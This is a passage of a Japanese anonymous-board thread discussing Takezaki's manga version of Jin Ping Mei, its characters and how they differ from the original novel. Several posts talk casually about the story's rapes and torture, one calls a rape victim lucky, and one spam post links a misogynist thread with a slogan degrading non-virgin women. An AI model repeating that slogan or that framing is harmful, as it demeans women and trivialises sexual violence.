でも池に落ちたシーンであまりの普段との変わりように吹いたのでおK。
藩金蓮、大旦那さまを早く始末してくれないかな。

214 :花と名無しさん:2006/12/17(日) 18:22:12 ID:pK67KPnb0
デラ読んだー
青琴篇読んでなかったので一気読み。
気になって仕方なかったこと。
正妻がアレじゃ正妻部屋の設定がダメになるじゃん・・・
それとも大旦那様の時は閉鎖されていて月娘奥様が復活させた?(それも怖)
にしても桂姐がアホカワイイ。

それにしても青琴…あの滅私奉公な愛はどうか。
「私が体を差し出して旦那様を守る」の一本やりで、
それが多感な年頃の旦那様を一番傷つけると思わなかったんだろうか。
かといって、大切なものを守るためには体も汚すし汚い手も使う的な、
大奥様・金蓮系の凛としたタイプにも見えない。
自分が犠牲になっていればいい、というタイプは、生きていたら金蓮に
相当やり込められたような気もする。
…て、個人的な感想です。青琴ファンの方、すまん。

215 :花と名無しさん:2006/12/17(日) 18:28:30 ID:???O
その意見もよく分かるけど、月娘様や金蓮のように知恵や度胸があるわけではない
何の力もない女だったらそれ以外の方法は思いつかないと思う。
だからこそ出来ることは化けて出てきて仕返しするくらいしかなかったんじゃ?

216 :花と名無しさん:2006/12/17(日) 18:44:33 ID:???O
>>207
その話読んで、春梅が嫁(妾)に行きそうになった先の
正妻を思い出したよ。

217 :花と名無しさん:2006/12/17(日) 19:04:52 ID:???0
瓶児が黒い…あのままじゃ豚小屋に落ちるぞ。改めろ。

218 :花と名無しさん:2006/12/18(月) 00:04:18 ID:???0
瓶児黒いかな?
金蓮にツバ茶や豚の小便茶を出す雪娥や、
嘘占いをしたり夢遊病の使用人を放置しておく玉楼と同じ(きんぺ世界での)凡人レベルじゃない?
行動はアレなこともあるけど、発想自体は普通の人が普通に思っちゃう程度。

黒いのは一夫多妻制の社会で、しかも自分自身妾でありながら
本音では「旦那様に近づく女全てを殺したい」と思ってる金蓮じゃない?


219 :花と名無しさん:2006/12/18(月) 00:20:40 ID:???O
黒さを自覚できてるのが、どうにもピカレスクで良い
黒ければ黒いほど頂点に近付くのが金瓶梅の食物連鎖だね
旦那様や、最近ではフウさんが好きだ。

220 :219:2006/12/18(月) 00:24:08 ID:???O
訂正
×旦那様→○大旦那様
似非インテリの顔面削いだところに痺れた。

221 :花と名無しさん:2006/12/18(月) 01:05:41 ID:???0
大旦那様はサディストだね。
旦那様や金蓮の実用的な悪とは違って、趣味で行う悪。
大旦那様のキャラは大好きなんだけど、
大旦那様の登場によって旦那様と金蓮の悪が中途半端化しちゃったのが残念。
悪人としての格好よさを全部持っていかれてしまった感じ。

222 :花と名無しさん:2006/12/18(月) 02:01:18 ID:???0
>>221

> 旦那様と金蓮の悪が中途半端化しちゃった

確かに。じゃあお二人には大旦那様以上の悪辣さで、かつ痛快に、
大旦那様を葬ることに期待したいな。

223 :花と名無しさん:2006/12/18(月) 12:41:03 ID:???0
あの坊ちゃん旦那様のいい子っぷりはなんだかねえ・・・
「おまえのようにはならない!」と大旦那様に言いながら
召使の女ポイ捨て(オバQ蘭香の時)他いろんなことやってたし、
金と人脈で築いた西門家の権力を引き継いでるわけだし。
同じ悪の性質が違う形で出た者同士の同属嫌悪という感じで
やってくれないかな?


224 :花と名無しさん:2006/12/18(月) 13:40:09 ID:ZjOMb/z70
許せないわ!西門伯は人を人と思ってないのね!風なことを言いながら、
あんただって人を人と思っていない言動が多いぞ姐さんw

ところで原典メインキャラの王六児がいつ出てくるのかと思ってたんだけど、
青琴編で出てきてたんだね>六児

225 :花と名無しさん:2006/12/18(月) 14:24:43 ID:???O
誰だっけ、六児って

ていうか名前で○児(例:瓶児とか)多いね
男名でも使われていたみたいだし

226 :花と名無しさん:2006/12/18(月) 16:20:15 ID:???0
>>223
大旦那様に比べて自分は女に優しいと思ってるらしい旦那様、かっこ悪いよねぇ…
処女のウンカを犯したり、金蓮の身代わりに知り合いの女を武松に殺させたのは誰なのかと。
嗜虐趣味に心血を注がないだけで、それ以外は旦那様、大旦那様によく似てるよ。

>>225
大旦那様の正妻として水揚げされて、
虐待されて歯抜けにされて「草魚」になった女だよ>六児


227 :花と名無しさん:2006/12/18(月) 17:38:03 ID:???0
似たもの同士だよねー。
金蓮と瓶児が旦那様を独占したい!と思ってるところで
結局同類なのと同じように。
自分の浅ましさや利己心に気づいていない人間を
金蓮はガンガン成敗してきたんだから、旦那様がそうなっちゃオシマイ。

大旦那様がどんどんケダモノ化、瓶児どんどんアホの子化して
旦那様と金蓮がいい人のように正当化されちゃうのは
キンペの面白さが薄まってしまうアブナイ傾向だ…

228 :花と名無しさん:2006/12/18(月) 17:59:35 ID:???0
そいえば大旦那様が鬼畜になった原因て不明なままだったよね。
またいずれ大旦那様は再登場するだろうから、いずれは…と希望してるんだけど。
それまで竹崎さん頑張って欲しい。人気も続きますように……

229 :花と名無しさん:2006/12/18(月) 18:06:15 ID:???0
>>223
>>226
まあオバQは自分とやった直後に下男とあんあんやってるのをみればしょうがない
(実際は強姦だったけど、あのシーンだけだと下男との情事を見られて言い訳しているようにみえるし)
うんかは旦那様暗殺しようとしたおしおきだしな。
大旦那だったら家畜や下男に輪姦させたあと数日に渡って虐待して最後はぶっころしてるよ。
お仕置きだけで女だから殺さないと解放してやっただけでもラッキーってことじゃない?

230 :花と名無しさん:2006/12/18(月) 18:09:23 ID:???0
オバQは元々下男通じて旦那様といい仲になろうとしていたので
あの下男がなんていって取り次いだかが問題だよね。
旦那様を慕っている女がいるから一度でいいので相手してやってください、みたいなお願いだったんじゃない?
どう見ても旦那様の趣味じゃないからね。
旦那様から手を出したわけじゃないんだから、あいつの場合はポイ捨てじゃないでしょ。

231 :花と名無しさん:2006/12/18(月) 18:57:35 ID:???0
>>229-230
しかし青琴が望んだような大人には育ってないな>旦那様w

232 :花と名無しさん:2006/12/18(月) 20:14:20 ID:???O
旦那様がフェミ男になってしまったのは、ゲストの男たちの駄目っぷりを
輝かせる為、仕方ない処置だと思われますがやはり残念。
初心にかえって親父と陰険な悪男対決を繰り広げて欲しい。
>>256
原典でメイン張った人がまたえらい目に遭ってるねw
原典での役どころが気になるわ

233 :花と名無しさん:2006/12/18(月) 20:16:51 ID:???0
>>229
「武大を殺したらウンカが敵討ちに来たんで、お仕置きに強姦して放り出そう」
っていう発想が、もう悪だよ。
大旦那様よりは明らかにマシだけど、旦那様も所詮五十歩百歩の悪人だから、
大旦那様を「悪人だから」という理由で批判するのは、自分を棚に上げ過ぎと思う。
憎むなら、青琴を追い詰めたことのみを理由にすればいいのにな。

234 :花と名無しさん:2006/12/18(月) 20:17:24 ID:???O
× >256
○ >>226
すいません少し落ち着きます

235 :花と名無しさん:2006/12/18(月) 20:24:21 ID:???0
>>229
何もしてない正妻たちでさえ散々拷問した大旦那がその程度で満足して殺してくれるわけないって
おそらく数年に渡って毎日輪姦拷問の繰り返しで死なせてさえくれないと思う

236 :花と名無しさん:2006/12/18(月) 20:38:35 ID:???O
まさに外道、というやつだな。
だけどそこに痺れる憧れるぅ!>大旦那様

237 :花と名無しさん:2006/12/18(月) 20:56:22 ID:???0
>>232
途中から登場する番頭の女房で旦那様の不倫相手>王六児
でも恵蓮みたいに破滅せず、旦那様が腹上死するまで
順調に金と快楽を絞り続け、最後ほとんどの登場人物が
死ぬか落ちぶれるかしたあとも平和に余生を過ごしたスゲー人。

238 :花と名無しさん:2006/12/18(月) 21:20:46 ID:???0
>>236
あ、あの……もしや、あなたはJOJOファンですか?

239 :花と名無しさん:2006/12/19(火) 00:03:18 ID:???O
原典の恵蓮てどういう末路なの?
図に乗りすぎて自滅というのは同じらしいけど。

240 :花と名無しさん:2006/12/19(火) 00:44:01 ID:???O
>>237
ありがとう。
せっかく原典で生還できたのに、竹崎版であの扱いかいw


241 :花と名無しさん:2006/12/19(火) 00:56:12 ID:v7llWv6A0
>>239
西門慶が恵蓮とヤるために遠くへ出張させていた夫が戻ってくる
→恵蓮夫とデキていた雪蛾、恵蓮浮気と金蓮がそれに噛んでいたことをチクる
→夫激怒、金蓮を殺すと喚く→金蓮激怒、西門慶を焚きつける
→恵蓮を独占したかった西門慶乗る→恵蓮夫、ハメられ無実の罪で投獄
→実は夫を愛していた恵蓮、西門慶に必死で夫の助命を乞う
→ほだされて西門慶、恵蓮夫を牢から出そうとする→金蓮がんばる
→恵蓮夫遠流→恵蓮絶望→さらに夫を寝取っていた雪蛾と大ゲンカ
→首括って死ぬ→「運がなかったな」(西門慶談)

242 :花と名無しさん:2006/12/19(火) 01:04:45 ID:???O
>「運がなかったな」(西門慶談)
鬼畜ww原典は斜め上だなwww

243 :花と名無しさん:2006/12/19(火) 01:19:07 ID:v7llWv6A0
>>242
鬼畜だす。
恵蓮も図に乗り過ぎだったが、とにかく恵蓮夫ぶちこんじまえ!な
旦那様と金蓮はやりたいほーだい。
大奥様は逆に恵蓮をいたわったり、女寝取るために公権力まで
引き込んでる旦那様を諌めたりしてる。
竹崎版との共通点は首括ってるとこだけだな…

244 :花と名無しさん:2006/12/19(火) 07:57:06 ID:???O
サンクス!
でも大喧嘩→首括るの繋がりがわからないw
発作的にやった?

245 :花と名無しさん:2006/12/19(火) 11:06:12 ID:???0
>>241
なんつーか皆我慢知らなすぎw

246 :花と名無しさん:2006/12/19(火) 17:14:58 ID:???0
え〜雪蛾、恵蓮夫とできてたの?なんでまたよりによって…

247 :花と名無しさん:2006/12/19(火) 19:13:58 ID:???0
竹崎版のまじめな雪姐さんが好きだから
あんなクソ女の旦那なんかとできているなんて
漫画とは完全に別物とはいえ
なんか嫌だな。

248 :花と名無しさん:2006/12/19(火) 21:23:42 ID:???O
嫁のお陰で、流されるわケチつくわ
恵蓮ダンナ踏んだり蹴ったりだなw

249 :花と名無しさん:2006/12/20(水) 16:52:57 ID:???0
金連てあの奥様メンバーの中では一番化粧濃そうだね。

250 :花と名無しさん:2006/12/20(水) 17:54:21 ID:???O
玉楼三十歳が原典どおりなら、あの若作りをナメてはいけない

251 :花と名無しさん:2006/12/20(水) 21:02:34 ID:IhoNjEYs0
原典の玉楼が落ち着いていて万事大人なのは年齢のせいかな。
靴の模様を決める時でも「私はあなたたちみたいに若くないから
派手な模様にできないわ」と年増なのを隠していないし。
竹崎版はだいぶ頼りない性格だし、年齢設定を変えた?のはよかったね。

252 :花と名無しさん:2006/12/20(水) 22:01:46 ID:???O
化粧してるシーンはあまり無いよね

253 :花と名無しさん:2006/12/20(水) 22:56:19 ID:???0
玉楼は化粧より道具を持ってるシーンの方が印象が強いw

254 :花と名無しさん:2006/12/20(水) 23:04:55 ID:???O
雪娥がノーメイクで金蓮が厚化粧、他の人たちはほどほどなのかな。

255 :花と名無しさん:2006/12/20(水) 23:11:23 ID:???0
>>251
玉楼は25〜27程度と思しき金蓮より年上みたいだし
(金蓮の「玉楼姐さんもまだ女盛り」とかいうセリフがあったと思った)
竹崎版でも30歳くらいじゃない?

256 :花と名無しさん:2006/12/20(水) 23:30:51 ID:???0
でも玉楼姐さんけっこう好みかも。
ほっそりして大人しめの外見とか、真っ黒な瞳とか。
道具マニアでも呪いオタクでも許すw

257 :花と名無しさん:2006/12/20(水) 23:54:36 ID:???0
上にもかかれてたけど、桂姐がなんかアホカワイくなってたのにびっくり。
結構読んでない話もあって、桂姐は「金蓮なんて死んじゃえ!!ギュッギュッ」
の腹黒イメージしか知らなかったのでちょっと萌えかも。ある意味ツンデレっぽい??

っていうか、金蓮姐さん、男も女も悦ばすテクをお持ちだなんて(*´Д`)ハァハァ


258 :花と名無しさん:2006/12/21(木) 00:09:14 ID:???0
>>257
旦那様との初めての逢瀬の時に
「金蓮は道行く男を誘惑していたとはいえ、実は武大以外に経験のないウブな主婦でした」
みたいな記述があったのに、短期間で凄いテクニシャンになったよね。
(前の雇い主のお爺ちゃんとは未遂…だよね?)

259 :花と名無しさん:2006/12/21(木) 00:19:40 ID:???0
>>258
工エエェェ(´Д`)ェェエエ工
なにそれ

260 :花と名無しさん:2006/12/21(木) 00:37:04 ID:???0
>>258
未遂じゃないよ、しっかりがっつり頂かれてます。
爺さんと武大だけだったんだろ。

それで一目ぼれした相手…しかもテクニシャンだったら
もうめろめろだったんだろうな。

良かったね金連w

261 :花と名無しさん:2006/12/21(木) 01:20:05 ID:???0
金蓮は厚化粧なのかな。
もともと顔立ちが派手そうだけど。

262 :花と名無しさん:2006/12/21(木) 01:59:49 ID:???0
お肌の手入れをしててスッピンでもきれいそうだけどね〜、金蓮。
>>260
なんとなく、武大とはやってないと思い込んでいたよ。
夫婦だからそれはないか・・・

263 :花と名無しさん:2006/12/21(木) 13:00:11 ID:???0
3日ご無沙汰してたら自動的にとりあえずそのへんにいる男と
くっつくのが金蓮だから
西門家にいる時も小者と娘婿とデキてたし、
追い出されて王婆の家に居候したら王婆の息子とくっつく
武松が戻ってきたら「やっぱり私はこの人と結ばれる運命なんだわ」と
男好き恋愛好きは生まれついての本性かと
だがそういう金蓮も、それなりに可愛い

264 :花と名無しさん:2006/12/21(木) 15:31:13 ID:???0
竹崎版じゃ背中の皮剥がれて町から逃げたよね>王婆の息子

金蓮は厚化粧ってより、肌の手入れに重点置いてそうなイメージ
インチキ化粧品でかぶれた時も肌が綺麗になるとかそんな類のじゃなっかた?


265 :花と名無しさん:2006/12/21(木) 18:48:48 ID:???0
常時すっぴんの雪娥を内心非難してたから
「女たるもの人前では常に化粧をしていなくては」ぐらいは思ってるんだろうな>金蓮
そして蒸し饅頭屋の女房だった時は安物の化粧品しか買えなかったから
西門家の妾になって思う存分高級化粧品を使いまくっているのかも知れない

266 :花と名無しさん:2006/12/22(金) 20:02:29 ID:???0
「女が美しさに金をかけないで何にかけるの」だもんな。

267 :花と名無しさん:2006/12/22(金) 20:15:27 ID:???0
そういや金蓮姐さん宦官が売りに来た高い化粧品惜しげもなくかってたね

268 :花と名無しさん:2006/12/22(金) 23:25:21 ID:X57mT3S+0
吹き出物ができただけで旦那様と顔をあわさないぐらいだから。
それが西門家じゃ生存競争だからだろーね。

にしても、「空き家に空き巣は入りませんものね」とか
他の奥様方に得々と言ってる姐さん。
本当に旦那様は嬌児姐さんや玉楼姐さんを放ったらかしてんだろーか。
それもひどいな。

269 :花と名無しさん:2006/12/22(金) 23:36:51 ID:???0
旦那様の奥様お通い回数ランキングって、どうなんだろう??

金蓮>>>>>>>瓶児>>>(越えられない壁)>>>玉楼>>>嬌児?>雪蛾?
大奥様がどこに入るのかがよくわからない・・・

270 :花と名無しさん:2006/12/23(土) 00:07:16 ID:???0
大奥様のところには、用がなければ行かない。


271 :花と名無しさん:2006/12/23(土) 00:12:06 ID:???O
いや待て
金蓮、瓶児>>>(超えられない壁)>>
>>>>どこぞの娼妓>どこぞの人妻>どこぞの女中>どこぞの小娘
>>>>>>>>玉楼その他


272 :花と名無しさん:2006/12/23(土) 00:15:56 ID:???0
>>271
あ、原作じゃシャレにならんぐらいその通りだ。

273 :花と名無しさん:2006/12/23(土) 08:16:22 ID:???0
瓶児の陰で霞んでるが玉楼って犯され要員だな。
王偉に犯されたり大旦那様が連れてきた大男に犯されたり。
瓶児と違ってかなり傷ついて苦しんだりしているので
けっこう気の毒だ。

274 :花と名無しさん:2006/12/23(土) 10:17:18 ID:???0
>>273
確かに。瓶児は楽しんじゃうからねえ…。
けど玉楼って王偉に仕返しした時、かっこよかった〜。
それまで躊躇してるから余計スカっとした。

随喜の件でも事情察して雪蛾助けてあげるしさ。
でも瓶児の分は無いところが微妙にウケたw

275 :花と名無しさん:2006/12/23(土) 11:32:00 ID:???O
嬌児も影薄いけどいいキャラだよね
桂姐とのコンビネーションから見て、色恋で足をとられることはなさそう
この抜け目のなさが一番西門家にしっくりしてる

276 :花と名無しさん:2006/12/23(土) 12:23:47 ID:???0
なんで旦那さまは大奥様のところにいかないんだろ
なんだかんだいって大奥様を正妻として本当に大切にしているから
嫌っているわけじゃないのに
むしろ一番大事にして信頼しているのは大奥様みたいにみえるけど

277 :花と名無しさん:2006/12/23(土) 12:24:19 ID:???0
そこにいくと他の奥様は体だけの関係って感じもするくらいなのに

278 :花と名無しさん:2006/12/23(土) 12:34:00 ID:???0
他の奥様方とはあくまで「恋愛」、大奥様とは「同志」という感じだね。
陳腐な解釈ながら。
旦那様が「もっと女の顔を見せろよ」的な誘いをかけても突っぱねるけど、
旦那様が悩んでいたらさり気なく忠告に来たり、
黙って膝枕してやる大奥様には萌えだ。

279 :花と名無しさん:2006/12/23(土) 12:41:50 ID:???0
もしも旦那様が病気にでもなって不細工になったら
大奥様だけは見捨てずに変わらずに愛してくれそう
でも他の奥様は逃げていきそうな予感がする

280 :花と名無しさん:2006/12/23(土) 13:38:09 ID:???0
金蓮はどうかな>旦那様が病気にでもなって不細工になったら
金蓮は「私は私が選んだ人を無条件で愛する」という潔さがいいけれど、
その分捨てる時は無慈悲に捨てそうだ。
不細工なただのいい人なんか興味なさそうだし。
旦那様から金と顔と女扱いの上手さを抜いたらヘボンに優しい程度の
大した人間じゃないもんな。

281 :花と名無しさん:2006/12/23(土) 13:57:29 ID:???0
正確に言えば
金→それを稼ぐ甲斐性
女の扱い→テクニックお上手で会話もおしゃれ。つまり技術と知性がある
って、ことだから。
それが旦那様の魅力なんでしょうね。

282 :花と名無しさん:2006/12/23(土) 15:49:04 ID:???O
男の価値は顔じゃないって、利に聡い西門家の面々なら分かってそうだね


283 :花と名無しさん:2006/12/23(土) 16:21:24 ID:???O
原典では知らないけど、わたなべ版では月娘に尻叩かれて?(ウロ覚え)
旦那様がババーァッと仕事をこなすシーンがあったな。
やればできる子!みたいで見直した。

284 :花と名無しさん:2006/12/23(土) 16:36:38 ID:???0
>>273
玉楼、瓶児も多いけど、実は金蓮が一番犯されてる気がする。
王偉・イケメン道士・雪蛾の愛人・琴童との浮気のお仕置きの時の浮浪者みたいな人たちとか・・・
前者二人と違って自分から首突っ込んでった結果が多いけど

>>274
玉楼は最初に「使ってません」って宣言しちゃったからね。
玉楼に「瓶児の分」っていう発想がないのは当たり前だ。

285 :花と名無しさん:2006/12/23(土) 16:54:23 ID:???0
薬屋と質屋には先代からの真面目な番頭がいて、そっちが切り回してる。
金で提刑官の地位を貰ってからは、どんどん賄賂や裏金が入ってくるようになる。
でも金づるの人脈を広げるための接待や気配りは上手で、才能を感じる。
しかしすごく大切な仕事をポカしかけ、月娘に救われることもしばしば。
あと、腰巾着をやってる没落貴族の親友が、遊び人の寄生虫ながら
上流の交際術を心得ていて、彼のアドバイスに助けられている面も多いかも。


286 :花と名無しさん:2006/12/23(土) 16:56:38 ID:???0
あ、しまった>>285>>283あて

287 :284:2006/12/23(土) 17:53:44 ID:???0
間違えた。
×玉楼は最初に「使ってません」って宣言しちゃった
○瓶児は最初に「使ってません」って宣言しちゃった

288 :花と名無しさん:2006/12/23(土) 18:38:30 ID:???0
>>284
浮気のお仕置きの時は強姦はされてなかったよ
旦那様は奥様の浮気には嫉妬深いので
自分から他の男の犯させるってことはしないようだ
それからイケメン道士は合意の上
瓶児の元下男のストーカー男と間違えてるのかな?
(このストーカーとは最初だけは同意だけど、その後は監禁強姦だから)

289 :花と名無しさん:2006/12/23(土) 18:40:44 ID:???0
未遂も含めて、強姦の被害にあってないのって嬌児姉さんと雪我姉さんだけだよね。
大奥様は旦那様以外の男にはマッサージも嫌と言う鉄壁の貞節によって
大旦那の下男に犯されそうになったのを未然に防いだから凄い。
瓶児だったら、最初はイヤイヤと言っておいて、そのうちに、あんあんああああーー!!と
喜びそうだ……。

290 :花と名無しさん:2006/12/23(土) 19:38:31 ID:???0
>>288
道士の時、最初はグアーーーと襲い掛かってきて、
金蓮は「え?なに?」って感じだったから、強姦かなと解釈してた
途中から和姦になったのは同意だけど。
よくあんな環境で楽しめるな。

>>289
瓶児は「喜ぶ」というより「歓ぶ」って感じがするな
金蓮に触られても感じるところを見ると、頭と身体はきっと完全に別物なんだよね。
不感症ならぬ多感症ってやつかな。きっと花子虚のすごい調教の賜物なんだろう。
決してけなす訳ではなく、瓶児の身体はミラクル過ぎて理解の外、人外レベルだと思う

291 :花と名無しさん:2006/12/23(土) 20:18:57 ID:???O
>>285
ありがと!
ある程度の地位があれば後は外交術がモノを言うのか
現代と同じだね。しかしおいしいな西門家

292 :花と名無しさん:2006/12/23(土) 21:02:46 ID:???0
>>284
あ、玉楼って瓶児の嘘信じてたっけ?
「私は使ってません、天地神明に誓って!…でも他のお姉さま達は
 存じませんが」とかいけしゃあしゃあと言ってのけたのに対して
金蓮と雪蛾?か嬌児が速攻噛み付いてた気がしてたから
てっきり玉楼も嘘って知ってたのかと思ってた。
ごめんよ玉楼、ホントにいい人なんだな。

しかし、あのネタってそれぞれの性格がよく出てて好き。
使わない派も理由が違うし。
 金蓮:旦那様じゃなきゃダメ!道具なんて論外
 玉楼:こんなもの既に沢山もってる、つまらないw

使う派もそれぞれ。
 嬌児:使ってみようかな〜でも人にバレるのは恥ずいわw→まあ人並み?
 瓶児:元ダンナのお陰で羞恥心全くナシw→もうなんというかww
 雪蛾:嬌児と瓶児のお陰で茹ですぎて料理に使う→流石料理人w
 

293 :花と名無しさん:2006/12/23(土) 21:23:36 ID:???0
>>292
瓶児が「使った」ことを知ってるのは雪蛾と嬌児だけど、
二人共後ろ暗いところがあるから他人には言えないだろう

294 :花と名無しさん:2006/12/24(日) 08:52:50 ID:???0
>>292
金蓮は送り主の大旦那様を怪しんでたからだと思う。
あと、六本届いたんだよな?大奥様はどうしたんだろ。

295 :花と名無しさん:2006/12/24(日) 09:49:28 ID:???0
>>294
あの時は確か夫婦そろって仕事?で何日か留守してたんじゃなかったっけ?
二人とも帰って来たときに、皆で言わないようにってひそひそしてたのに
瓶児が報告して大奥様ご立腹→そんな物いただけない、返すから皆出せ
→瓶児「私は使ってない云々」→金蓮たち怒る
→返すまで庭師バージョンの大旦那様と下男のせいで一悶着
→何とか瓶児以外の分が揃って随喜ネタ終了

だった気がする。

もらっても大奥様なら即捨てそう。
大旦那様からだから返品で済ませたけど。

296 :花と名無しさん:2006/12/24(日) 16:29:17 ID:???0
>>294
金蓮が道具類を好まないのは本当だと思う
まがい物より本物の肉の方がいいんだろう
でも、その「持ち主」は別に旦那様に限らないみたいだけど…

297 :花と名無しさん:2006/12/24(日) 17:32:38 ID:???0
>>296
まじめ一直線の筈だった導師の場合は
旦那様の代わりって感じだったね。
相手切羽詰ってるし自分もご無沙汰だったからまいっか…って感じ?

298 :花と名無しさん:2006/12/24(日) 18:33:04 ID:???O
禁欲的で堅物な坊っちゃんの化けの皮剥がれて
からかい半分ボランティア精神半分に思った。

299 :花と名無しさん:2006/12/24(日) 23:17:00 ID:???0
>>290
ふと思ったんだけど瓶児がそんなミラクルな身体になったのって
竹山の薬が関係してたりするんだろうか?
元々そういう素質もあったぽいけど金蓮がはっきり
「竹山の薬でもうあなたの体は男なしではいられない」と
言ってたし、途中で効果が切れてるとしても
瓶児の淫乱度をレベルアップさせるきっかけにはなってそうで
もしそうならちょっと気の毒だと思った。

300 :花と名無しさん:2006/12/24(日) 23:39:36 ID:???O
軽くふれられただけで感じてしまう病って実際にあったような
病気というか本人の体質的なものというか
最悪、乗り物に乗ってる時の振動だけでイク事もある

301 :花と名無しさん:2006/12/25(月) 00:37:25 ID:???0
瓶児はもともと流されやすい+下半身が緩い設定だったと思うが、
あの感じっぷりが人気を博したのか、なんだかこのごろミラクル度に
拍車がかかっているような気もする。
一歩間違うと人外の域だから竹崎さんも気をつけた方が・・・

302 :花と名無しさん:2006/12/25(月) 01:16:02 ID:???0
もう既に一歩間違っちゃってると思うけど
あんな子はエロゲにしかいない気がする
(自分から男漁りするタイプなら分かるけど、殆ど強姦的シチュエーションから始まってるし)

303 :花と名無しさん:2006/12/25(月) 01:17:18 ID:???0
竹山の…というかあれは元ダンナの功績だと思ってた>瓶児の体状況
色んな薬とか道具使ってたとかいうし。

304 :花と名無しさん:2006/12/25(月) 09:27:11 ID:???O
けどカシキョって立たなかったんじゃ…

305 :花と名無しさん:2006/12/25(月) 11:04:40 ID:???O
立たなくても欲情しないわけじゃない
立たないからこそ、薬や道具を使い、ネチネチネチネチ女を攻められるのですよ…


306 :花と名無しさん:2006/12/25(月) 14:22:36 ID:???0
瓶児登場のあたりを読んでないので、元ダンナのキャラにちょっと驚き

原典では花子虚は郭の遊女に入れあげてて、ほったらかしにされてる間に
旦那様とくっつき、という展開だから、子虚とネッチリやっていたという
印象が薄い。
でも密通してた頃から酒は強いし部屋明るくして女中に見物させながら
騎乗位が好きとか(昔の基準で言えば)相当スレてる感じではあった。
瓶児は大臣の妾→宮廷の宦官が自分の甥(子虚)の正妻に、という身の上で、
夫の子虚より舅の宦官と仲が良く全財産を預けられたりしている(後に全部
西門家にやってしまう)ので、実は舅の宦官とデキてたんじゃないかと疑っていた。
宦官は立つものが無い分それこそ薬や道具で…

307 :花と名無しさん:2006/12/26(火) 12:54:50 ID:???O
蒼天航路思い出すね

308 :花と名無しさん:2006/12/27(水) 23:50:06 ID:ugK5CZP20
平時の過去が金蓮に劣らず変わっていることをだんだん理解してきました

309 :花と名無しさん:2006/12/28(木) 00:13:10 ID:???O
銭形の方かと思った

310 :花と名無しさん:2006/12/28(木) 01:02:37 ID:hmP8auWg0
高学歴よ、非処女と結婚してはいけない ★第2膜
http://tmp6.2ch.net/test/read.cgi/joke/1167228552/

「非処女は肉便器」と書かれたTシャツを着て街を歩く俺は英雄

311 :花と名無しさん:2006/12/28(木) 01:02:49 ID:???0
少女漫画板の常で瓶児のあだ名が屁異痔とかにならないのは
やっぱ愛されてるんだなスレ住人に

312 :花と名無しさん:2006/12/28(木) 01:11:16 ID:???O
なんだかんだでしっかりおしおきくらってるからね
毎回ヨゴレをかぶって体張ってるし>瓶児

313 :花と名無しさん:2006/12/28(木) 01:20:35 ID:???0
瓶児は確かにウザキャラだけど、
男性読者としてはサービスがいいので憎めませんな。

314 :花と名無しさん:2006/12/28(木) 02:31:33 ID:???0
誰とは言わないが例のヘタレ男に比べたら、
かわいいほうだと思う。

315 :花と名無しさん:2006/12/28(木) 04:52:11 ID:???0
>>314
YOU、伏せないで言っちゃいなYO!

316 :花と名無しさん:2006/12/28(木) 13:39:37 ID:???0
二月号読んできたけど、瓶児の異常っぷりに拍車がかかってるよ。
マジでサイコパスなんじゃないかと思った>瓶児


317 :花と名無しさん:2006/12/28(木) 13:56:40 ID:???0
Yahooコミックに金瓶梅登場。売れるかな?

318 :花と名無しさん:2006/12/28(木) 15:04:11 ID:???0
最新号さいこうwwww
旦那様悪口大会腹いてえwwww
奥様方の旦那様との馴れ初め語りもアリ
読まないと絶対ソン




とはいえ、>>316同様、瓶児異常化がまた進みすぎなのは?と思た
ありゃー●チガイだよもお・・・

319 :花と名無しさん:2006/12/28(木) 16:34:45 ID:???0
最新号、おもしろかた! 瓶児=サイコパス説。納得できる以上っぷりですた。
せつが姐さんときょうじ姐さんの、旦那様との熱々時代の話もおもしろかた。
きょうじ姐さんは前にもあったけど、せつが姐さんと旦那様のシーンて初めて見たよ。
でもせつが姐さんは脱がないのねえ。竹崎さん、せつがにはあまりお色気を出させ
ないように、わざと描いているかんじですね。

で、一巻を読み直してみたんだけど、きょうじ姐さんは初期って「ぽっちゃり」タイプ
だったんだね。いつのまにかスレンダーになってるwww

320 :花と名無しさん:2006/12/28(木) 17:17:38 ID:???0
嬌児かわいすぎvvvvv
「まあ今は空き家の嬌児ねえさんにもそんなころが」
金蓮ひどすぎwwww

321 :花と名無しさん:2006/12/28(木) 21:45:48 ID:???0
今回はお姐さん方の違う一面って感じで新鮮で楽しかった。
何気に守銭奴だと自認しちゃう嬌児、かわいらしいw
いつもは魚さばいたりニワトリしめたりと豪快でサバサバ系の
雪蛾さんのお惚気を初めて見た。ちょっと自慢?してたりして
やっぱり「女性」なんだなあと再確認。

残念なのが玉楼。再婚の話はどっちが持ってきたんだろう。
ぜひ1話使ってやってくれないかな〜。

322 :花と名無しさん:2006/12/28(木) 22:08:29 ID:???0
旦那様と姐さんたちの熱い馴れ初め話がよかった。
玉楼姐さんだけ単なる人づてだったのが残念
それにしても瓶児と張り合う馬鹿女がいたとは……。
もっとも瓶児みたいに自己陶酔トラブルメーカーではないけど

323 :花と名無しさん:2006/12/28(木) 22:58:18 ID:???0
今回瓶児お咎めなしなんだね
玉楼の立場だってなかっただろうに…

324 :花と名無しさん:2006/12/28(木) 23:39:06 ID:???0
金蓮姐さん、フウさんにあんたも瓶児に痛い目みりゃ分るわよ〜的な事
考えてたけど、果たしてそんな展開あるかな?

何があっても一枚上手っぽいから巧く自分の都合良いように利用しそう。

325 :花と名無しさん:2006/12/28(木) 23:44:15 ID:???0
フウさんも腰ぬかす程のサイコパス
それが瓶児クオリティw

326 :花と名無しさん:2006/12/29(金) 00:04:16 ID:???0
金蓮が瓶児に痛い目見させられたことってそんなにある?
王偉エピソードしか思いつかないな
それも、もとはといえば金蓮が「後ろを許すなんて信じられないわ」なんて他人の夫婦生活に口を出すから…
(レイプ教唆が報復として釣り合うかと問われれば、当然NOだけど)

最近の瓶児は作者に都合よく「悪役」「痛い子」にさせられ過ぎな気がするな
瓶児のみ、他の奥様方みたいに良いエピソードでフォローされたことがない。

まだ先のことは分からないけど、竹崎版金瓶梅がもし原典通りの結末を迎えるなら
「瓶児はあんなに痛い女だったんだから、金蓮に子供を殺されて死んでも当然」みたいな描き方は勘弁して欲しい。
金蓮にはきちんと悪女としての業の深い生き方を全うして欲しいし、
瓶児が今後子供を孕んで金蓮の脅威となるなら、旦那様と瓶児との愛をしっかりと描いて欲しい。
武松といい、瓶児といい、竹崎版金瓶梅は正ライバルが弱すぎる

327 :花と名無しさん:2006/12/29(金) 00:34:39 ID:???0
>>326
痛い目っていうか、面倒を起こして迷惑こうむるという感じ?
母親に素直になれなかったおませな子供とか秋菊のケースみたいにさ。

確かに「悪い天然ちゃん」な立場にされてるよね。
